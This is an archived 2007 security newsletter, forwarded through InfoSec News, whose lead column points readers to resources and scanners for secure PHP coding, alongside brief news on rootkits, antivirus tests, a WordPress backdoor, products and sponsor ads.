[ISN] How to Write Secure PHP Code

From: InfoSec News (alerts@private)
Date: Thu Mar 15 2007 - 22:20:11 PST

Forwarded with permission from: Security UPDATE <Security_UPDATE (at) list.windowsitpro.com>


Free Brief: Personal HP Workstations = Higher ROI?

Messaging Security for Small and Midsized Businesses

Before your next company laptop is lost or stolen... 

=== CONTENTS ===================================================

IN FOCUS: How to Write Secure PHP Code

   - Panda Software Sees Rise in Rootkits
   - Relative Unknowns Top Antivirus Test Chart
   - Microsoft Pushes Ahead with OneCare
   - Recent Security Vulnerabilities

   - Security Matters Blog: Gaping Hole in Wordpress
   - FAQ: Windows Not Ready for Daylight Savings Time
   - Tell Us About the Products You Love!
   - Share Your Security Tips

   - NAC Appliance Gets Cheaper and Faster




=== SPONSOR: HP ================================================

Free Brief: Personal HP Workstations = Higher ROI?
   Discover why financial services executives get a LOT more out of 
their IT investments by investing in HP Personal Workstation 
Technology. Quickly learn how workstations ensure accuracy and security 
while driving down short- and long-term operating costs. This quick- 
read guide is a must read today.

=== IN FOCUS: How to Write Secure PHP Code =============
   by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

Last week, I wrote about a few things you need to know about securing 
your PHP installations. I also pointed to several sites that offer good 
information about what to look out for and what configuration changes 
you might need to make. If you missed that article, you can read it on 
our Web site at the URL below. 

If you have PHP installed, then obviously you're going to run PHP code. 
Some of that code might be written by third-party developers and some 
of it you might write yourself. Either way, you should learn about 
secure coding practices for PHP. Doing so can help you write better 
code and help you audit third-party code for potential problems. 

As an example of why the latter is important, be sure to read my blog 
article "Gaping Hole in Wordpress" (you can link to it from the GIVE 
AND TAKE section of this newsletter below) to learn about how someone 
slipped some "back doors" into Wordpress, which is a hugely popular 
PHP-based blogging platform. You can write simple scripts that audit 
third-party code to look for potential back doors by scanning the code 
for any or all of the dangerous functions I discussed last week. 

To help you write your own secure PHP code, I went looking for 
resources and found several decent Web sites that provide writing aid 
and some tools that look for coding vulnerabilities. The sites at the 
URLs below are a big help, so take some time to study them carefully. 
If you know of any others, send me a message with a URL and I'll share 
it here in the newsletter for everyone's benefit. 

Secure Programming in PHP

PHP - Secure coding

Secure Programming for Linux and Unix HOWTO, Chapter 10, Language-
Specific Issues, 10.8 PHP (this pertains to Windows also)

PHP Security Consortium's PHP Security Guide

PHP Input Filter (Developer Shed's Network, PHP Scripts)

SecurePHP Wiki

PHP Top 5 (security problems extracted from SANS Top 20 list)

Top 10 ways to crash PHP

Chorizo! Web Application Security Scanner

PHP Security Scanner


Editor's Note: Do you work in a mixed environment? Visit TechX World 
(first URL below) for information about Windows interoperability. 
The TechX World community gives you access to interoperability articles 
that aren't available anywhere else; news, tips, and tricks from 
interop experts and other users; and forums and blog posts by other 
community members. Join the TechX World community and sign up for the 
TechX Interoperability UPDATE email newsletter (second URL below).

=== SPONSOR: Symantec ==========================================

Messaging Security for Small and Midsized Businesses
   Did you know that 75% of corporate intellectual property resides in 
email? The challenges facing this vital business application range from 
spam to the costly impact of downtime and the need for effective, 
centralized email storage systems. Join us for a free Web seminar and 
learn the key features of a holistic approach to managing email 
security, availability, and control. On-Demand Web Seminar.

=== SECURITY NEWS AND FEATURES =================================

Panda Software Sees Rise in Rootkits
   Panda Software said that in 2006, its PandaLabs team tracked a 62 
percent increase in the amount of malicious code that used rootkit 
technology. The figure is on track to increase even more in 2007.

Relative Unknowns Top Antivirus Test Chart
   In a recent test by AV Comparatives, the top three overall 
performers were G DATA Software AntiVirusKit, AEC TrustPort Antivirus 
Workstation, and Avira AntiVir Personal Edition Premium--not household 
names in the US.

Microsoft Pushes Ahead with OneCare
   In the wake of reports that its Windows Live OneCare security suite 
is inadequate, Microsoft announced plans to release a Live OneCare 2.0 
beta soon.

Recent Security Vulnerabilities
   If you subscribe to this newsletter, you also receive Security 
Alerts, which inform you about recently discovered security 
vulnerabilities. You can also find information about these 
discoveries at

=== SPONSOR: Beachhead =========================================

Before your next company laptop is lost or stolen... 
be sure your valuable data is protected! Lost Data Destruction (LDD) 
from Beachhead Solutions provides immediate and affordable protection 
through enterprise-controlled encryption and destruction of at-risk 
data. No end-user involvement to deploy or manage ensures maximum 
security and workforce productivity. Effective with/without internet 

=== GIVE AND TAKE ==============================================

SECURITY MATTERS BLOG: Gaping Hole in Wordpress
   by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=4DFD0:57B62BBB09A6927928FAD7D792CB2F3D

If you use Wordpress, you might need to upgrade to version 2.1.2 
pronto! There are a couple of huge holes in the code, apparently 
inserted by someone for the purpose of intrusion.

FAQ: Windows Not Ready for Daylight Savings Time
   by John Savill, http://list.windowsitpro.com/t?ctl=4DFCF:57B62BBB09A6927928FAD7D792CB2F3D 

Q: What is the daylight saving time (DST) problem?

Find the answer at

   What products are you using that save you time or make your workload 
a little lighter? What hot product discoveries have you made that other 
IT pros need to know about? Let the world know about your experiences 
in Windows IT Pro's monthly What's Hot department. If we publish your 
story in What's Hot, we'll send you a Best Buy gift card! Send 
information about your favorite product and how it has helped you to 

   Share your security-related tips, comments, or problems and 
solutions in Security Pro VIP's Reader to Reader column. Email your 
contributions to r2r@private If we print your submission, 
you'll get $100. We edit submissions for style, grammar, and length.

=== PRODUCTS ===================================================
   by Renee Munshi, products@private

NAC Appliance Gets Cheaper and Faster
   Nevis Networks announced LANsecure OS 3.0 for its LANenforcer 
network access control (NAC) appliances. Highlights of the new OS 
version are faster endpoint posture checks coupled with identity-based 
access control, a three-fold increase in user capacity on LANenforcer 
appliances (resulting in reduced costs), and integration with existing 
identity-management systems to enforce predefined application access 
policies to simplify administration. Prices for LANenforcer appliances 
start at $15,000. LANsecure OS 3.0 will be generally available March 
19. For more information, go to

=== RESOURCES AND EVENTS =======================================
   For more security-related resources, visit

Infosecurity Europe is Europe's number-one dedicated Information 
Security event held 24-26 April 2007, Grand Hall, Olympia. Now in its 
12th year, this event continues to provide an unrivalled education 
programme, new products and services, and exhibitors and visitors from 
every segment of the industry. For further information: 

Get Ready for the Windows Server Longhorn Roadshow! 
   Seize control of your Windows infrastructure with Microsoft's 
biggest server release since Windows 2003. Get a live, under-the-hood 
look at Longhorn virtualization, deployment, Web services, and 
breakthroughs in core reliability. This one-day event is filled with 
demonstrations and in-depth discussions designed for IT pros who want a 
deep understanding of Windows Server Longhorn.   

Deploy Exchange Server 2007 Without a Hitch! 
   This one-day technical training event teaches you how to preempt 
pitfalls and avoid corrupting your infrastructure. You'll learn how to 
effectively install, manage, and secure Exchange Server 2007 in a 64-
bit environment. You'll also get a peek into the integration of 
Outlook, SharePoint Server 2007, and Exchange Server 2007. Register 

=== FEATURED WHITE PAPER =======================================

SQL Reporting Services is an exciting way for organizations to gain 
access and insight into their important business data stored in SQL 
Server. Get an overview of how to increase your production server's 
performance by offloading Reporting Services to a secondary server. 
Download your free copy today! 

=== ANNOUNCEMENTS ==============================================

Introducing a Unique Security Resource 
   Security Pro VIP is an online information center that delivers new 
articles every week on topics such as perimeter security, 
authentication, and system patches. Subscribers also receive tips, 
cautionary advice, direct access to our editors, and a host of other 
benefits! Order now at an exclusive charter rate and save up to $50! 

Grab Your Share of the Spotlight!  
   Nominate yourself or a peer to become IT Pro of the Month. This is 
your chance to get the recognition you deserve! Winners will receive 
over $600 in IT resources and be featured in Windows IT Pro. It's easy 
to enter--we're accepting April nominations now, but only for a limited 
time! Submit your nomination today: 


Security UDPATE is brought to you by the Windows IT Pro Web site's 
Security page (first URL below) and Security Pro VIP (second URL 

Subscribe to Security UPDATE at

Be sure to add Security_UPDATE@private 
to your antispam software's list of allowed senders.

To contact us: 
   About Security UPDATE content -- letters@private
   About technical questions -- http://list.windowsitpro.com/t?ctl=4DFD9:57B62BBB09A6927928FAD7D792CB2F3D
   About your product news -- products@private
   About your subscription -- windowsitproupdate@private
   About sponsoring Security UPDATE -- salesopps@private

View the Windows IT Pro privacy policy at

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2007, Penton Media, Inc. All rights reserved.

Visit the InfoSec News Security Bookstore

This archive was generated by hypermail 2.1.3 : Thu Mar 15 2007 - 22:28:35 PST